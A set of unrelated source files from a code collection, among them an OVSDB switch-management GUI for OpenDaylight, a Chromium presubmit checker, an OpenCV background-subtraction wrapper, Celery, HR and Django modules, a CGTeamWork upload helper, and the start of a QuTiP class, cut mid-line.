dataport\r\n global putURLport\r\n bridge=simpledialog.askstring(\"input bridge name\",\"please enter bridge name you want to add port\")\r\n portname=simpledialog.askstring(\"input port name\",\"please enter port name\")\r\n portnumber=simpledialog.askstring(\"input port number\",\"please enter port number\")\r\n portnameencode=urllib.parse.quote(portname,safe ='')\r\n print(portnameencode)\r\n dataport={\r\n \"network-topology:termination-point\": [\r\n {\r\n \"tp-id\": portname,\r\n \"ovsdb:ofport\": portnumber,\r\n \"ovsdb:name\": portname\r\n }\r\n ]\r\n }\r\n putURLport='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+bridge+'/termination-point/'+portnameencode\r\n print(putURLport)\r\n \r\n\r\ndef sendport():\r\n dataconnection = 'port.json'\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n with open(dataconnection) as fh:\r\n mydata = fh.read()\r\n responsePut = requests.put(putURLport,\r\n data=mydata,\r\n auth=HTTPBasicAuth('admin','admin'),\r\n headers=headers,\r\n )\r\n print(responsePut.status_code)\r\n #checkresult(responsePut.status_code) \r\n\r\ndef combineport():\r\n addport()\r\n writeToJSONFile(path,fileNamePort,dataport)\r\n sendport()\r\n \r\ndef deletebridge():\r\n global deleteURL\r\n bridge=simpledialog.askstring(\"Input bridge name you want to delete\",\"Input bridge 
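The safe='' argument in the quote() calls above matters: RESTCONF path segments such as port names can contain '/' characters that must become %2F, but quote() leaves '/' alone by default. A standalone illustration (the port name is invented):

import urllib.parse

assert urllib.parse.quote('eth0/1') == 'eth0/1'             # '/' kept by default
assert urllib.parse.quote('eth0/1', safe='') == 'eth0%2F1'  # '/' escaped as the URL needs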
name you want to delete\")\r\n deleteURL='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+ bridge\r\n print(bridge)\r\n print(deleteURL)\r\n\r\ndef deleteapi():\r\n payload={'some':'data'}\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n response = requests.delete(deleteURL, data=json.dumps(payload), headers=headers,auth=HTTPBasicAuth('admin', 'admin'))\r\n print(response.status_code)\r\n #checkresult(response.status_code)\r\n \r\ndef combinedelbridge():\r\n deletebridge()\r\n deleteapi()\r\n \r\ndef deleteport():\r\n global deleteURL\r\n bridge=simpledialog.askstring(\"Input bridge name where port is located\",\"Input bridge name where is port located\")\r\n portname=simpledialog.askstring(\"input port name\",\"please enter port name\")\r\n portnameencode=urllib.parse.quote(portname,safe ='')\r\n deleteURL='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+ bridge+'/termination-point/'+portnameencode\r\n print(bridge)\r\n print(deleteURL)\r\n\r\ndef combinedelport():\r\n deleteport()\r\n deleteapi()\r\n\r\ndef terminateconnection():\r\n terminateurl='http://' + ip + ':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid\r\n payload={'some':'data'}\r\n\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n\r\n response = requests.delete(terminateurl, data=json.dumps(payload), headers=headers,auth=HTTPBasicAuth('admin', 'admin'))\r\n print(response.status_code)\r\n #checkresult(response.status_code)\r\n \r\ndef delete():\r\n branch = Tk()\r\n branch.title('Choose what you want to delete?')\r\n button8= Button(branch, text=\" Delete Bridge \",command=combinedelbridge)\r\n button8.pack(pady=10,ipady=2)\r\n button9= Button(branch, text=\" Delete Port \",command=combinedelport)\r\n button9.pack(pady=10,ipady=2)\r\n branch.geometry(\"400x100\")\r\n branch.mainloop()\r\n \r\ndef callovsdb():\r\n root = Tk()\r\n width = 300\r\n height = 400\r\n screen_width= root.winfo_screenwidth()\r\n screen_height = root.winfo_screenheight()\r\n \r\n x_coordinate = (screen_width/2) - (width/2)\r\n y_coordinate = (screen_height/2) - (height/2)\r\n root.title('OVSDB ToolBar') \r\n button = Button(root, text=\" Input Manager IP and Switch UUID & IP \",command=get_data)\r\n button.pack(pady=10,ipady=2)\r\n button2= Button(root, text=\" Initiate Active Connection \",command=initiateconnection)\r\n button2.pack(pady=10,ipady=2)\r\n button3= Button(root, text=\" Check Connection \",command=checkconnection)\r\n button3.pack(pady=10,ipady=2)\r\n button4= Button(root, text=\" Terminate Connection \",command=terminateconnection)\r\n button4.pack(pady=10,ipady=2)\r\n button5= Button(root, text=\" Add-Bridge \",command=combinebridge)\r\n button5.pack(pady=10,ipady=2)\r\n button6= Button(root, text=\" Add-Port \",command=combineport)\r\n button6.pack(pady=10,ipady=2)\r\n button7= Button(root, text=\" Delete Bridge or Port \",command=delete)\r\n button7.pack(pady=10,ipady=2)\r\n label1 = Label(root, text = \"author : eric_angwyn\")\r\n label1.pack(side=RIGHT)\r\n root.geometry(\"%dx%d+%d+%d\" % (width, height, x_coordinate, y_coordinate))\r\n root.mainloop()\r\n 
","sub_path":"EasyFlow2.0/uuidswitch.py","file_name":"uuidswitch.py","file_ext":"py","file_size_in_byte":10484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494370568","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"\nPresubmit for Chromium HTML/CSS/JS resources. See chrome/browser/PRESUBMIT.py.\n\"\"\"\n\nimport regex_check\n\n\nclass ResourceChecker(object):\n def __init__(self, input_api, output_api, file_filter=None):\n self.input_api = input_api\n self.output_api = output_api\n self.file_filter = file_filter\n\n def IncludeCheck(self, line_number, line):\n return regex_check.RegexCheck(self.input_api.re, line_number, line,\n \"(|)\", \"Closing tags is unnecessary.\")\n\n def RunChecks(self):\n \"\"\"Check for violations of the Chromium web development style guide. See\n http://chromium.org/developers/web-development-style-guide\n \"\"\"\n results = []\n\n affected_files = self.input_api.change.AffectedFiles(\n file_filter=self.file_filter, include_deletes=False)\n\n for f in affected_files:\n errors = []\n\n for line_number, line in enumerate(f.NewContents(), start=1):\n error = self.IncludeCheck(line_number, line)\n if error:\n errors.append(error)\n\n if errors:\n abs_local_path = f.AbsoluteLocalPath()\n file_indicator = 'Found resources style issues in %s' % abs_local_path\n prompt_msg = file_indicator + '\\n\\n' + '\\n'.join(errors) + '\\n'\n results.append(self.output_api.PresubmitPromptWarning(prompt_msg))\n\n return results\n","sub_path":"chrome/browser/web_dev_style/resource_checker.py","file_name":"resource_checker.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320327975","text":"\"\"\"\nMog2 background subtraction\nWrapper around opencv implementation\nEmily Dunkel\n2018\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport pdb\n\n\ndef get_diff(img, aux, config, is_first_frame):\n \"\"\"\n Returns mask\n\n Sample Inputs\n >>> config = {}\n >>> config['history'] = 200\n >>> config['varThresh'] = 15\n >>> config['alpha'] = 0.05\n >>> img = np.array([[5, 0, 15], [0, 5, 0], [15, 0 , 5]])\n\n Test on first frame\n >>> fgmask, aux = get_diff(img, {}, config, True) \n >>> fgmask\n array([[255, 255, 255],...\n\n Test on second frame but with no aux, should raise error\n >>> out1, out2 = get_diff(img, {}, config, False)\n Traceback (most recent call last):\n KeyError:...\n\n Test on second frame, with img equal to previous one, should equal all zeros\n >>> fgmask, aux = get_diff(img, aux, config, False)\n >>> fgmask\n array([[0, 0, 0],...\n\n Test on third frame, with new img. 
fgmask should be 255 where img == 100\n >>> img = np.array([[5, 100, 15], [100, 5, 100], [15, 100 , 5]])\n >>> fgmask, aux = get_diff(img, aux, config, False)\n >>> fgmask\n array([[ 0, 255, 0],...\n \"\"\"\n\n if is_first_frame:\n mog = cv2.createBackgroundSubtractorMOG2(history=config['history'], varThreshold=config['varThresh'], detectShadows=False)\n aux['mog2'] = {}\n else:\n try:\n mog = aux['mog2']['mog']\n except:\n raise KeyError('aux input to mog2.py does not contain mog2')\n fgmask = mog.apply(img, learningRate=config['alpha'])\n \n # store mog object for next time \n aux['mog2']['mog'] = mog\n return fgmask, aux\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)\n","sub_path":"helm/tracker/preprocessors/background_subtractions/mog2.py","file_name":"mog2.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"641701102","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nimport subprocess\nimport os\nimport delegator\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n@shared_task\ndef start_snakemake_task(working_directory):\n logger.debug('Start snakemake')\n logger.debug(\"working_directory: \", working_directory)\n\n snakefile = os.path.join(working_directory, 'Snakefile')\n print(\"snakefile!! : \", snakefile)\n # subprocess.check_output(['/ssd/Howard/Virus/venv/bin/snakemake', '-s', snakefile], shell=True)\n # os.system('/ssd/Howard/Virus/venv/bin/snakemake -s ' + snakefile)\n\n snakemake_command = '/ssd/Howard/Virus/venv/bin/snakemake' + snakefile\n snakemake_result = delegator.run('whoami', block=False)\n print(\"c.pid: \", snakemake_result.pid)\n print(\"c.out: whoami ~ \", snakemake_result.out)\n print(\"c.return_code: \", snakemake_result.return_code)\n\n snakemake_result = delegator.run('groups', block=False)\n print(\"c.pid: \", snakemake_result.pid)\n print(\"c.out: groups ~ \", snakemake_result.out)\n print(\"c.return_code: \", snakemake_result.return_code)\n print(\"Second time!\")\n\n # snakemake_command = '/ssd/Howard/Virus/venv/bin/snakemake' + snakefile\n # snakemake_result = delegator.run('/ssd/Howard/Virus/venv/bin/snakemake', cwd = working_directory, block=False)\n # print(\"c.pid: \", snakemake_result.pid)\n # print(\"c.out: \", snakemake_result.out)\n # print(\"c.return_code: \", snakemake_result.return_code)\n\n # snakemake_output_file = os.path.join(working_directory, 'logs', 'snakemake_output.log')\n\n snakemake_result = subprocess.call(['/ssd/Howard/Virus/venv/bin/snakemake'], cwd = working_directory, shell=True)\n # Write snakemake output to log file!\n # print(\"snakemake_result: \", snakemake_result)\n # with open('snakemake_output_file', 'wb') as f:\n # f.write(snakemake_output_file.stdout)\n\n print(\"snakemake_result: \", snakemake_result)\n","sub_path":"VirusRNASeq/dataanalysis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"156290256","text":"from scope.employees import Employee\nfrom scope.position_objects import Position, Vacancy\nfrom scope.subdivisions import Department, Unit\n\n\nclass Environment:\n \"\"\"\n Class is responsible for handling of all processes at the site.\n The class saves all created objects and works with it.\n \"\"\"\n def __init__(self):\n self.departments = []\n 
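For reference, the OpenCV calls the wrapper above makes reduce to this minimal loop; the parameters mirror the wrapper's config keys (history, varThresh, alpha) and the frames are synthetic noise, so this is a sketch rather than a realistic pipeline:

import numpy as np
import cv2

mog = cv2.createBackgroundSubtractorMOG2(history=200, varThreshold=15, detectShadows=False)
for _ in range(5):
    frame = np.random.randint(0, 255, (64, 64), dtype=np.uint8)  # fake grayscale frame
    fgmask = mog.apply(frame, learningRate=0.05)
assert fgmask.shape == (64, 64)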
self.units = []\n self.positions = []\n self.vacancies = []\n self.employees = []\n\n def create_department(self, **kwargs):\n \"\"\"\n The function is responsible for department object creation.\n Creates the object and adds to Environment's list of Department objects.\n \"\"\"\n department = Department.create_subdivision(**kwargs)\n self.departments.append(department)\n\n def create_unit(self, **kwargs):\n \"\"\"\n The function is responsible for unit object creation.\n Creates the object and adds to Environment's list of Unit objects.\n \"\"\"\n unit = Unit.create_subdivision(**kwargs)\n self.units.append(unit)\n self.create_unit_relations(unit)\n\n def create_unit_relations(self, unit):\n \"\"\"\n Checks relations between Unit and existing departments.\n Adds Unit's object to specific Department (into private units list).\n \"\"\"\n unit_department_id = unit.get_department_id()\n if unit_department_id:\n for department in self.departments:\n department.check_relation(unit_department_id, unit)\n\n def update_department(self, **kwargs):\n department = self.define_department_by_id(**kwargs)\n department.change_department(**kwargs)\n self.check_department_name_changes(department, **kwargs)\n\n def define_department_by_id(self, **kwargs):\n required_department_id = kwargs['id']\n for department in self.departments:\n if department.get_id() == required_department_id:\n return department\n\n def check_department_name_changes(self, department, **kwargs):\n department_name = kwargs['name']\n if department_name:\n department_id = department.get_id()\n self.update_unit_relations_to_department(department_id, department_name)\n self.update_position_relations_to_department(department_id, department_name)\n\n def update_unit_relations_to_department(self, id, name):\n department_id = id\n department_name = name\n for unit in self.units:\n if unit.get_department_id() == department_id:\n unit.change_department_name(department_name)\n\n def update_position_relations_to_department(self, id, name):\n department_id = id\n department_name = name\n for position in self.positions:\n subdivision_data = position.get_subdivision_data()\n subdivision_id = subdivision_data[0]\n print(subdivision_data, subdivision_id)\n if subdivision_id == department_id:\n position.change_subdivision_name(department_name)\n\n def update_unit(self, **kwargs):\n unit = self.define_unit_by_id(**kwargs)\n dep_id_initial = unit.get_department_id()\n unit.change_unit(**kwargs)\n dep_id_updated = unit.get_department_id()\n self.update_unit_relations(dep_id_initial, dep_id_updated, unit)\n\n def define_unit_by_id(self, **kwargs):\n required_unit_id = kwargs['id']\n for unit in self.units:\n if unit.get_id() == required_unit_id:\n return unit\n\n def update_unit_relations(self, dep_id_initial, dep_id_updated, unit):\n for department in self.departments:\n if dep_id_initial == department.get_id():\n department.units.remove(unit)\n if dep_id_updated == department.get_id():\n department.units.append(unit)\n\n def delete_department(self, **kwargs):\n department = self.define_department_by_id(**kwargs)\n dep_id = department.get_id()\n self.departments.remove(department)\n self.update_department_relations(dep_id)\n\n def update_department_relations(self, id):\n for unit in self.units:\n unit.discard_department_relation(id)\n\n def delete_unit(self, **kwargs):\n unit = self.define_unit_by_id(**kwargs)\n department_id = unit.get_department_id()\n self.units.remove(unit)\n self.delete_unit_from_department(department_id, unit)\n\n def 
delete_unit_from_department(self, department_id, unit):\n for department in self.departments:\n if department_id == department.get_id():\n department.units.remove(unit)\n\n def check_names(self, object_, name):\n if object_ == 'department':\n for department in self.departments:\n if name == department.get_name():\n return True\n elif object_ == 'unit':\n for unit in self.units:\n if name == unit.get_name():\n return True\n elif object_ == 'position':\n for position in self.positions:\n if name == position.get_name():\n return True\n elif object_ == 'vacancy':\n for vacancy in self.vacancies:\n if name == vacancy.get_name():\n return True\n\n def delete_object(self, **kwargs):\n object_type = kwargs['object_type']\n object_ = self.define_object_by_id(**kwargs)\n subdivision_data = object_.get_subdivision_data()\n if object_type == 'position':\n self.positions.remove(object_)\n elif object_type == 'vacancy':\n self.vacancies.remove(object_)\n elif object_type == 'employee':\n self.employees.remove(object_)\n self.delete_from_old_position(object_)\n\n if subdivision_data[1] == 'department':\n self.delete_object_from_department(subdivision_data[0], object_)\n elif subdivision_data[0] == 'unit':\n self.delete_object_from_unit(subdivision_data[0], object_)\n\n def delete_object_from_department(self, department_id, object_):\n for department in self.departments:\n if department.get_id() == department_id:\n if object_.__class__.__name__ == 'Position':\n department.positions.remove(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n department.vacancies.remove(object_)\n elif object_.__class__.__name__ == 'Employee':\n department.employees.remove(object_)\n\n def delete_object_from_unit(self, unit_id, object_):\n for unit in self.units:\n if unit.get_id() == unit_id:\n if object_.__class__.__name__ == 'Position':\n unit.positions.remove(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n unit.vacancies.remove(object_)\n elif object_.__class__.__name__ == 'Employee':\n unit.employees.remove(object_)\n\n def create_object(self, **kwargs):\n object_type = kwargs['object_type']\n object_ = None\n if object_type == 'position':\n object_ = Position.create_position_object(**kwargs)\n self.positions.append(object_)\n elif object_type == 'vacancy':\n object_ = Vacancy.create_position_object(**kwargs)\n self.vacancies.append(object_)\n self.create_object_relation_to_position(object_)\n self.create_object_relations_to_subdivisions(object_)\n\n def create_object_relation_to_position(self, object_):\n object_type = object_.__class__.__name__\n if object_type == 'Vacancy':\n for position in self.positions:\n if position.get_id() == object_.position_id:\n position.holder = (object_, 'vacancy')\n elif object_type == 'Employee':\n object_.position_id = None\n for vacancy in self.vacancies:\n if vacancy.get_id() == object_.vacancy_id:\n object_.position_id = vacancy.position_id\n object_.position_name = vacancy.position_name\n for position in self.positions:\n if position.get_id() == object_.position_id:\n position.holder = (object_, 'employee')\n\n def create_object_relations_to_subdivisions(self, object_):\n subdivision_id, subdivision_category = object_.get_subdivision_data()\n if subdivision_category == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_id:\n if object_.__class__.__name__ == 'Position':\n department.add_position(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n department.add_vacancy(object_)\n elif object_.__class__.__name__ == 
'Employee':\n department.add_employee(object_)\n elif subdivision_category == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_id:\n if unit.get_id() == subdivision_id:\n if object_.__class__.__name__ == 'Position':\n unit.add_position(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n unit.add_vacancy(object_)\n elif object_.__class__.__name__ == 'Employee':\n unit.add_employee(object_)\n\n def update_object(self, **kwargs):\n object_ = self.define_object_by_id(**kwargs)\n subdivision_data_initial = object_.get_subdivision_data()\n object_.change_position(**kwargs)\n subdivision_data_updated = object_.get_subdivision_data()\n self.update_object_relations(subdivision_data_initial, subdivision_data_updated, object_)\n\n def define_object_by_id(self, **kwargs):\n object_type = kwargs['object_type']\n required_object_id = kwargs['id']\n if object_type == 'position':\n for position in self.positions:\n if position.get_id() == required_object_id:\n return position\n elif object_type == 'vacancy':\n for vacancy in self.vacancies:\n if vacancy.get_id() == required_object_id:\n return vacancy\n elif object_type == 'employee':\n for employee in self.employees:\n if employee.get_id() == required_object_id:\n return employee\n\n def update_object_relations(self, subdivision_data_initial, subdivision_data_updated, object):\n if object.__class__.__name__ == 'Position':\n if subdivision_data_initial[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_initial[0]:\n department.positions.remove(object)\n elif subdivision_data_initial[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_initial[0]:\n unit.positions.remove(object)\n if subdivision_data_updated[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_updated[0]:\n department.positions.append(object)\n elif subdivision_data_updated[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_updated[0]:\n unit.positions.append(object)\n\n elif object.__class__.__name__ == 'Vacancy':\n if subdivision_data_initial[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_initial[0]:\n department.vacancies.remove(object)\n elif subdivision_data_initial[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_initial[0]:\n unit.vacancies.remove(object)\n if subdivision_data_updated[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_updated[0]:\n department.vacancies.append(object)\n elif subdivision_data_updated[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_updated[0]:\n unit.vacancies.append(object)\n\n elif object.__class__.__name__ == 'Employee':\n if subdivision_data_initial[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_initial[0]:\n department.employees.remove(object)\n elif subdivision_data_initial[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_initial[0]:\n unit.employees.remove(object)\n if subdivision_data_updated[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_updated[0]:\n department.employees.append(object)\n elif subdivision_data_updated[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_updated[0]:\n unit.employees.append(object)\n\n def 
create_employee(self, **kwargs):\n employee = Employee.create_employee(**kwargs)\n self.employees.append(employee)\n self.create_object_relation_to_position(employee)\n self.create_object_relations_to_subdivisions(employee)\n self.delete_vacancy_relation(employee.vacancy_id)\n employee.update_cooperation_history()\n\n def delete_vacancy_relation(self, vacancy_id):\n for vacancy in self.vacancies:\n if vacancy.get_id() == vacancy_id:\n self.vacancies.remove(vacancy)\n\n subdivision_id = vacancy.subdivision_id\n subdivision_category = vacancy.subdivision_category\n if subdivision_category == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_id:\n department.vacancies.remove(vacancy)\n elif subdivision_category == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_id:\n unit.vacancies.remove(vacancy)\n\n def update_employee(self, **kwargs):\n object_ = self.define_object_by_id(**kwargs)\n subdivision_data_initial = object_.get_subdivision_data()\n object_.change_employee(**kwargs)\n subdivision_data_updated = object_.get_subdivision_data()\n self.update_object_relations(subdivision_data_initial, subdivision_data_updated, object_)\n self.delete_from_old_position(object_)\n self.create_object_relation_to_position(object_)\n self.delete_vacancy_relation(object_.vacancy_id)\n object_.update_cooperation_history()\n\n def delete_from_old_position(self, object_):\n object_position_id = object_.get_position_id()\n for position in self.positions:\n if position.get_id() == object_position_id:\n position.holder = None","sub_path":"scope/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":15610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"235710094","text":"\"\"\"ecommerce URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom . import views\n\napp_name = 'products'\nurlpatterns = [\n path('', views.home, name = 'home'),\n path('contact/', views.contact, name = 'contact'),\n path('product//', views.product_view, name= 'product_view'),\n path('product//comment/save/', views.comment_save, name= 'comment_save'),\n path('product//review/save/', views.review_save, name= 'review_save'),\n path('product/category/', views.category, name= 'category'),\n path('product/checkout/', views.checkout, name= 'checkout'),\n path('product/cart/', views.cart, name= 'cart'),\n path('product/confirmation/', views.confirmation, name= 'confirmation'),\n]\n","sub_path":"src/ecommerce/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"571767801","text":"# -*- coding=UTF-8 -*-\n\"\"\"Use cgtw web api. 
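The three near-identical branches of update_object_relations above differ only in which list attribute (positions/vacancies/employees) they touch. A hedged refactor sketch, not the project's code, showing how a class-name-to-attribute map could collapse them:

# Hypothetical condensation: map the moved object's class to the list it
# lives in, then remove/append once instead of branching per class.
LIST_ATTR = {'Position': 'positions', 'Vacancy': 'vacancies', 'Employee': 'employees'}

def move_object(subdivisions_by_id, old_id, new_id, obj):
    attr = LIST_ATTR[obj.__class__.__name__]
    old = subdivisions_by_id.get(old_id)
    new = subdivisions_by_id.get(new_id)
    if old is not None:
        getattr(old, attr).remove(obj)
    if new is not None:
        getattr(new, attr).append(obj)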
\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport mimetypes\nimport os\nimport cast_unknown as cast\n\nfrom ..model import ImageInfo\nfrom .http import post\nimport datetime\nfrom .. import compat\n\nTYPE_CHECKING = False\nif TYPE_CHECKING:\n from typing import Text\n\n\nclass ChinaTimezone(datetime.tzinfo):\n \"\"\"Timezone of china.\"\"\"\n\n def tzname(self, dt):\n return \"UTC+8\"\n\n def utcoffset(self, dt):\n return datetime.timedelta(hours=8)\n\n def dst(self, dt):\n return datetime.timedelta()\n\n\ndef _upload_image_v5_2(filename, folder, token):\n # type: (Text, Text, Text) -> ImageInfo\n \"\"\"Upload image to server.\n\n Args:\n filename (str): Filename.\n folder (str): Server upload folder, usually same with project name.\n token (str): Server session token.\n\n Returns:\n ImageInfo: Uploaded image information.\n \"\"\"\n\n filename = cast.text(filename)\n basename = os.path.basename(filename)\n data = post(\n \"web_upload_file\",\n {\n \"folder\": folder,\n \"type\": \"project\",\n \"method\": \"convert_image\",\n \"filename\": basename,\n },\n token=token,\n files={\n \"file\": (basename, open(filename, \"rb\"), mimetypes.guess_type(basename)[0])\n },\n )\n assert isinstance(data, dict), type(data)\n return ImageInfo(data[\"max\"], data[\"min\"], filename)\n\n\ndef _upload_image_v6_1(filename, folder, token):\n # type: (Text, Text, Text) -> ImageInfo\n \"\"\"Upload image to server.\n\n Args:\n filename (str): Filename.\n folder (str): Server upload folder, usually same with project name.\n token (str): Server session token.\n\n Returns:\n ImageInfo: Uploaded image information.\n \"\"\"\n\n filename = cast.text(filename)\n basename = os.path.basename(filename)\n mtime = os.path.getmtime(filename)\n data = post(\n \"web_upload_file\",\n {\n \"method\": \"attachment_upload\",\n \"is_web\": \"Y\",\n \"db\": folder,\n \"format\": \"image\",\n \"filename\": basename,\n \"attachment_argv\": {\n \"type\": \"main\",\n \"filename\": filename,\n \"modify_time\": datetime.datetime.fromtimestamp(\n mtime, ChinaTimezone()\n ).strftime(\"%Y-%m-%d %H:%M:%S\"),\n },\n },\n token=token,\n files={\n \"file\": (basename, open(filename, \"rb\"), mimetypes.guess_type(basename)[0])\n },\n )\n assert isinstance(data, dict), type(data)\n return ImageInfo(data[\"max\"], data[\"min\"], filename, data[\"att_id\"])\n\n\ndef upload_image(filename, folder, token):\n # type: (Text, Text, Text) -> ImageInfo\n\n if compat.api_level() == compat.API_LEVEL_5_2:\n return _upload_image_v5_2(filename, folder, token)\n return _upload_image_v6_1(filename, folder, token)\n","sub_path":"cgtwq/server/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314772837","text":"# This file is part of QuTiP: Quantum Toolbox in Python.\n#\n# Copyright (c) 2011 and later, Paul D. Nation and Robert J. Johansson.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. 
Neither the name of the QuTiP: Quantum Toolbox in Python nor the names\n# of its contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n###############################################################################\n\n__all__ = ['eseries', 'esval', 'esspec', 'estidy']\n\nimport numpy as np\nimport scipy.sparse as sp\nfrom qutip.qobj import Qobj\n\n\nclass eseries():\n \"\"\"\n Class representation of an exponential-series expansion of\n time-dependent quantum objects.\n\n Attributes\n ----------\n ampl : ndarray\n Array of amplitudes for exponential series.\n rates : ndarray\n Array of rates for exponential series.\n dims : list\n Dimensions of exponential series components\n shape : list\n Shape corresponding to exponential series components\n\n Methods\n -------\n value(tlist)\n Evaluate an exponential series at the times listed in tlist\n spec(wlist)\n Evaluate the spectrum of an exponential series at frequencies in wlist.\n tidyup()\n Returns a tidier version of the exponential series\n\n \"\"\"\n __array_priority__ = 101\n\n def __init__(self, q=np.array([], dtype=object), s=np.array([])):\n\n if isinstance(s, (int, float, complex)):\n s = np.array([s])\n\n if (not np.any(np.asarray(q, dtype=object))) and (len(s) == 0):\n self.ampl = np.array([])\n self.rates = np.array([])\n self.dims = [[1, 1]]\n self.shape = [1, 1]\n\n elif np.any(np.asarray(q, dtype=object)) and (len(s) == 0):\n if isinstance(q, eseries):\n self.ampl = q.ampl\n self.rates = q.rates\n self.dims = q.dims\n self.shape = q.shape\n elif isinstance(q, (np.ndarray, list)):\n ind = np.shape(q)\n num = ind[0] # number of elements in q\n sh = np.array([Qobj(x).shape for x in q])\n if any(sh != sh[0]):\n raise TypeError('All amplitudes must have same dimension.')\n self.ampl = np.array([x for x in q])\n self.rates = np.zeros(ind)\n self.dims = self.ampl[0].dims\n self.shape = self.ampl[0].shape\n elif isinstance(q, Qobj):\n qo = Qobj(q)\n self.ampl = np.array([qo])\n self.rates = np.array([0])\n self.dims = qo.dims\n self.shape = qo.shape\n else:\n self.ampl = np.array([q])\n self.rates = np.array([0])\n self.dims = [[1, 1]]\n self.shape = [1, 1]\n\n elif np.any(np.asarray(q, dtype=object)) and len(s) != 0:\n if isinstance(q, (np.ndarray, list)):\n q = np.asarray(q, dtype=object)\n ind = np.shape(q)\n num = ind[0]\n sh = np.array([Qobj(q[x]).shape for x in range(0, num)])\n if np.any(sh != sh[0]):\n raise TypeError('All amplitudes must have same dimension.')\n self.ampl = np.array([Qobj(q[x]) for x in range(0, 